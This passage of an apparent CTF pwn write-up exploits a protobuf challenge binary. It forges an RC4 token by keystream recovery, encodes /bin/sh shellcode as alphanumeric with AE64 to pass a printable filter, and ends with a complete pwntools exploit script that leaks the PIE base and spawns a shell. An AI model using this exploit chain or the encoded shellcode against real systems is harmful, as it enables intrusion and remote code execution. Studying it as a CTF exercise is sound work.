The constants for s (0xB95F..., v6, v7, v8, v9) are just the compiler laying down a long constant byte string in locals. IDA split it into separate locals (four qwords and one dword):

  • s at [rbp-0x250] (8 bytes)
  • v6 at [rbp-0x248] (8 bytes) → s + 8
  • v7 at [rbp-0x240] (8 bytes) → s + 16
  • v8 at [rbp-0x238] (8 bytes) → s + 24
  • v9 at [rbp-0x230] (4 bytes) → s + 32

These form a 36-byte RC4 ciphertext block in memory:

[s[0..7]] [s[8..15]] [s[16..23]] [s[24..31]] [s[32..35]]

All are stored little-endian. A quick Python snippet reconstructs the full ciphertext (s):

Python
vals = [
    0xB95FA87BA6AF366A,  # _QWORD s[0..7]
    0x918D1C0CC7837D63,  # v6
    0xF877F9B36B6EF2D3,  # v7
    0x8EFDECFCE888E2BF,  # v8
    0x40FE92FD,          # v9 (dword)
]

ct  = b""
ct += vals[0].to_bytes(8, "little")
ct += vals[1].to_bytes(8, "little")
ct += vals[2].to_bytes(8, "little")
ct += vals[3].to_bytes(8, "little")
ct += vals[4].to_bytes(4, "little")

print("[+] Ciphertext len:", len(ct))
print("[+] Ciphertext hex:", ct.hex())

Or dump it directly via GDB:

rdi = 0x88513fd5d15b4805
rsi = giaotoken
rdx = 0x26  ; len_s
rcx = '114514giaogiaogiao99'

$ pwndbg> x/s 0x7ffe3dfba680
0x7ffe3dfba680: "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@\376\177"

$ pwndbg> x/39x 0x7ffe3dfba680
0x7ffe3dfba680: 0x6a    0x36    0xaf    0xa6    0x7b    0xa8    0x5f    0xb9
0x7ffe3dfba688: 0x63    0x7d    0x83    0xc7    0x0c    0x1c    0x8d    0x91
0x7ffe3dfba690: 0xd3    0xf2    0x6e    0x6b    0xb3    0xf9    0x77    0xf8
0x7ffe3dfba698: 0xbf    0xe2    0x88    0xe8    0xfc    0xec    0xfd    0x8e
0x7ffe3dfba6a0: 0xfd    0x92    0xfe    0x40    0xfe    0x7f    0x00

Tip: Utilities like Pwndbg's dump memory <output_file> <start_addr> <end_addr> command make this extraction pleasantly trivial.

Exploit Strategy: Stream Cipher Trick

Since the encryption is deterministic and the key is static, we apply the textbook stream cipher recovery:

  1. Send a known dummy plaintext of the same length as s
  2. Observe the resulting ciphertext
  3. Derive the keystream: keystream = ciphertext ⊕ plaintext
  4. XOR the keystream with the known ciphertext s to recover the expected giaotoken

This gives us a valid token that passes the strcmp(). At that point, the RC4 check is defeated — and we control the giaotoken field with a valid value.
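
The four steps can be sketched offline as follows. Note the assumptions: oracle() is a hypothetical stand-in for "run the binary and dump the encrypted buffer", and it uses textbook RC4, which may differ from the challenge's custom routine. The XOR algebra is the same for any fixed keystream.

```python
def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def rc4_stream(key: bytes, n: int) -> bytes:
    """Textbook RC4 (KSA + PRGA); a stand-in, NOT the binary's custom variant."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

def oracle(plaintext: bytes) -> bytes:
    """Hypothetical encryption oracle; in practice this is a memory dump after rc4_enc."""
    return xor(plaintext, rc4_stream(b"114514giaogiaogiao99", len(plaintext)))

# Target ciphertext s, rebuilt from the constants in my_rc4
target = b"".join(v.to_bytes(n, "little") for v, n in [
    (0xB95FA87BA6AF366A, 8), (0x918D1C0CC7837D63, 8),
    (0xF877F9B36B6EF2D3, 8), (0x8EFDECFCE888E2BF, 8), (0x40FE92FD, 4)])

probe = b"T" * len(target)                # step 1: known plaintext
keystream = xor(oracle(probe), probe)     # steps 2-3: ciphertext XOR plaintext
token = xor(target, keystream)            # step 4: expected giaotoken

assert oracle(token) == target            # the forged token encrypts to s
```

Against the real target, only oracle() changes: send the probe as giaotoken, dump the encrypted buffer from memory, and feed those bytes into the same two XORs.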

3.2.2.6 Alphanumeric Shellcode

After bypassing the RC4 check with a valid giaotoken, the next barrier is the chk_content routine, which filters giaocontent:

C
__int64 __fastcall chk_content(__int64 a1, unsigned int a2)
{
  unsigned int v3;
  unsigned int i;

  v3 = a2;

  // 1) Strip trailing '\n' if present
  if ( *(_BYTE *)(a2 - 1 + a1) == '\n' )
  {
    *(_BYTE *)(a2 - 1 + a1) = 0;
    v3 = a2 - 1;
  }

  // 2) Check every byte for "printable" constraint
  for ( i = 0; ; ++i )
  {
    if ( v3 <= i )
      break;

    // Reject any control character (<= 0x1F) or DEL (0x7F)
    if ( *(char *)((int)i + a1) <= 0x1F || *(_BYTE *)((int)i + a1) == 0x7F )
    {
      puts("Oops!");
      exit(0);
    }
  }
  return i;
}

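In short: the payload must consist only of printable ASCII characters (0x20–0x7E); anything outside that range is rejected. Bytes ≥ 0x80 fail too, because the first comparison reads the byte as a signed char, so they compare as negative.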

  • Control characters (\0, \n, \r, \t, etc.) = exit(0)
  • 0x7F (DEL) = also rejected
  • One optional trailing \n is stripped, so we can afford to end with it
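
Before sending anything, it is cheap to run the same filter locally. The helper below is a small sketch mirroring chk_content as decompiled above; the function name is ours, not the binary's.

```python
def passes_chk_content(payload: bytes) -> bool:
    """Mirror of chk_content: True if the binary would accept the payload."""
    if payload.endswith(b"\n"):
        payload = payload[:-1]          # one trailing newline is stripped
    # signed-char compare in the binary also rejects bytes >= 0x80
    return all(0x20 <= b <= 0x7E for b in payload)

print(passes_chk_content(b"WTYH39Yj\n"))    # printable + trailing newline
print(passes_chk_content(b"\x48\x31\xc0"))  # raw shellcode bytes
```

Raw shellcode almost always fails this check, which is what pushes us toward an encoder.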

This is a standard "sanitize user input" guard:

"Make sure the payload looks normal."

To bypass it, we construct our payload using alphanumeric shellcode — a self-decoding payload that consists of only printable characters.

Example: ae64 Encoder

We can use ae64 to generate an alphanumeric version of shellcraft.sh():

Python
from pwn import *
from ae64 import AE64

context(arch='amd64', os='linux')

sc = AE64().encode(asm(shellcraft.sh()), strategy='small')
print(sc)

Example output:

[+] prologue generated
[+] encoded shellcode generated
[*] build decoder, try free space: 54 ...
[*] build decoder, try free space: 186 ...
[+] Alphanumeric shellcode generate successfully!
[+] Total length: 185

b'WTYH39YjoTYfi9pYWZjWTYfi9sO0t800T8U0T8Vj3TYfi9GF0t800T8KHc1jgTYfi1kcLJt03jhTYfi1OlVYIJ4NVTXAkv21B2t11A0v1IoVL90uzDjFzvsdked5AFPk2LF6ioJB0ddTTZ5vPnnkTFcpYBbFWDiF0AqAoNUp4hK73SE1rf539fWyD'

Other Alphanumeric Shellcode Options

Other encoders work as well:

  • alpha3: classic alphanumeric shellcode builder
  • pwnkit: personal encoder module with multiple encoding strategies
  • msfvenom -e x86/alpha_mixed: only works for 32-bit cases

3.2.2.7 ret2shellcode

This is the whole punchline of the challenge, waiting for us at the destination:

C
// shellcode injection
memcpy(dest, Msgiao->giaocontent.data, Msgiao->giaocontent.len);
((void (*)(void))dest)();  // code execution

The bytes in Msgiao->giaocontent.data (the protobuf field giaocontent) are copied by memcpy(dest, ..., len) into the buffer dest. Then ((void (*)(void))dest)(); casts dest to a function pointer and calls it:

  • (void (*)(void))dest → treat dest as "pointer to a function taking no args, returning void".
  • dest holds the attacker-controlled shellcode and sits in .bss, which is mapped executable here.
  • (...)(); → jump to that address and execute it.

So, in plain words:

"Take the bytes from Msgiao.giaocontent, copy them into executable memory at dest, and then jump there and run them as code."

All the RC4 quirks, protobuf descriptor oddities, and the chk_content printable filter are merely constraints on what we’re permitted to embed inside the Msgiao protocol buffer. (And yes, the trivial magic values for giaoid and giaosize need no sermon.)

This is the real payload delivery vector — the moment where it devolves into a clean ret2shellcode primitive.

3.2.3 Exploit

The final exploit chain in summary:

  • Leak PIE → compute base address.
  • Send the pointer to "yes" so the pointer-equality check passes and the backdoor opens.
  • Recover RC4 keystream → forge a valid giaotoken.
  • Encode /bin/sh with AE64 so it passes the printable-only filter.
  • Build a protobuf Msgiao containing:
    • giaoid (0x114514), giaosize (0x415411)
    • forged giaotoken
    • ASCII-safe encoded shellcode in giaocontent
  • Send serialized protobuf.
  • Program copies giaocontent into executable memory and jumps to it → shell.

The proto:

proto
syntax = "proto3";

package giao;

message Msgiao {
    int64  giaoid      = 1;
    int64  giaosize    = 2;
    bytes  giaocontent = 3;
    bytes  giaotoken   = 4;
}

Compile to generate pwn_pb2.py:

Bash
protoc --python_out=. pwn.proto

Exploit script:

Python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Title : Linux Pwn Exploit
# Author: Axura (@4xura) - https://4xura.com
#
# Description:
# ------------
# A Python exp for Linux binex interaction
#
# Usage:
# ------
# - Local mode  : ./xpl.py
# - Remote mode : ./xpl.py [ <HOST> <PORT> | <HOST:PORT> ]
#

from pwnkit import *
from pwn import *
import sys

# CONFIG
# ---------------------------------------------------------------------------
BIN_PATH = "./pwn"
LIBC_PATH = None
host, port = load_argv(sys.argv[1:])
ssl = False
env = {}
elf = ELF(BIN_PATH, checksec=False)
libc = ELF(LIBC_PATH) if LIBC_PATH else None

Context("amd64", "linux", "little", "debug", ("tmux", "splitw", "-h")).push()
io = Config(BIN_PATH, LIBC_PATH, host, port, ssl, env).run()
alias(io)  # s, sa, sl, sla, r, rl, ru, uu64, g, gp


# EXPLOIT
# ---------------------------------------------------------------------------
def exploit(*args, **kwargs):
    # --- Leak Memory
    ru("\n")
    sl("1337")

    ru("\n")
    sl("254")

    elf_base = int(r(14), 16) - 0x5008
    pa(elf_base)

    yes_addr = elf_base + 0x3041
    pa(yes_addr)
    sl(hex(yes_addr))

    # --- Construct Protobuf Message
    import pwn_pb2

    msg = pwn_pb2.Msgiao()

    """
    Magic
    """
    msg.giaoid = 0x114514
    msg.giaosize = 0x415411

    """
    RC4 token
    rdi = 0x88513fd5d15b4805
    rsi = giaotoken
    rdx = 0x26  ; len_s
    rcx = '114514giaogiaogiao99'

    pwndbg> x/s 0x7ffe3dfba680
    0x7ffe3dfba680: "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@\376\177"

    pwndbg> x/39x 0x7ffe3dfba680
    0x7ffe3dfba680: 0x6a    0x36    0xaf    0xa6    0x7b    0xa8    0x5f    0xb9
    0x7ffe3dfba688: 0x63    0x7d    0x83    0xc7    0x0c    0x1c    0x8d    0x91
    0x7ffe3dfba690: 0xd3    0xf2    0x6e    0x6b    0xb3    0xf9    0x77    0xf8
    0x7ffe3dfba698: 0xbf    0xe2    0x88    0xe8    0xfc    0xec    0xfd    0x8e
    0x7ffe3dfba6a0: 0xfd    0x92    0xfe    0x40    0xfe    0x7f    0x00
    """
    # s = "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@\375\177"
    s = "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@"
    ct = s.encode("latin1")
    print(
        "[DBG] Expected ciphertext: {},\n\t\tlength of ciphertext: {}".format(
            ct, len(ct)
        )
    )

    test_p = b"T" * len(ct)
    # msg.giaotoken = test_p
    """
    # test = "\006U\237\226\030\304n\334\032\020\347\241me\355\241\262\221\027\006\204\237F\201߇䊘\200\313\351ˤ\317u"
    pwndbg> dump memory ./test.bin 0x64e3eadf62f0 0x64e3eadf62f0+36
    """
    with open("./test.bin", "rb") as f:
        test_ct = f.read()

    print(
        "[DBG] Test ciphertext: {},\n\t\tlength of ciphertext: {}".format(
            test_ct, len(test_ct)
        )
    )

    ks = xor(test_ct, test_p)
    msg.giaotoken = xor(ct, ks)

    """
    Alpha shellcode
    """
    from ae64 import AE64

    sc = asm(shellcraft.sh())
    # sc = (
        # asm(shellcraft.open("flag", 0))
        # + asm(shellcraft.read("rax", "rsp", 0x100))
        # + asm(shellcraft.write(1, "rsp", 0x100))
    # )
    enc_sc = AE64().encode(sc, strategy="small")
    # enc_sc = b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2E0T2I0Q030z3P3G1P3r123V2p01187l0B0y3I3d0C3a133q3p03084y3G7n7m1m0m0o0s3r8O02114z4B0Z0B0k0n0403'
    print("[DBG] Encoded shellcode: {}\n\tLength: {}".format(enc_sc, len(enc_sc)))

    msg.giaocontent = enc_sc

    # --- Fire
    pl = msg.SerializeToString()
    sa(b"your giao: ", pl)

    # pause()
    io.interactive()


# PIPELINE
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    exploit()

Pwned:

pwn_protobuf_24
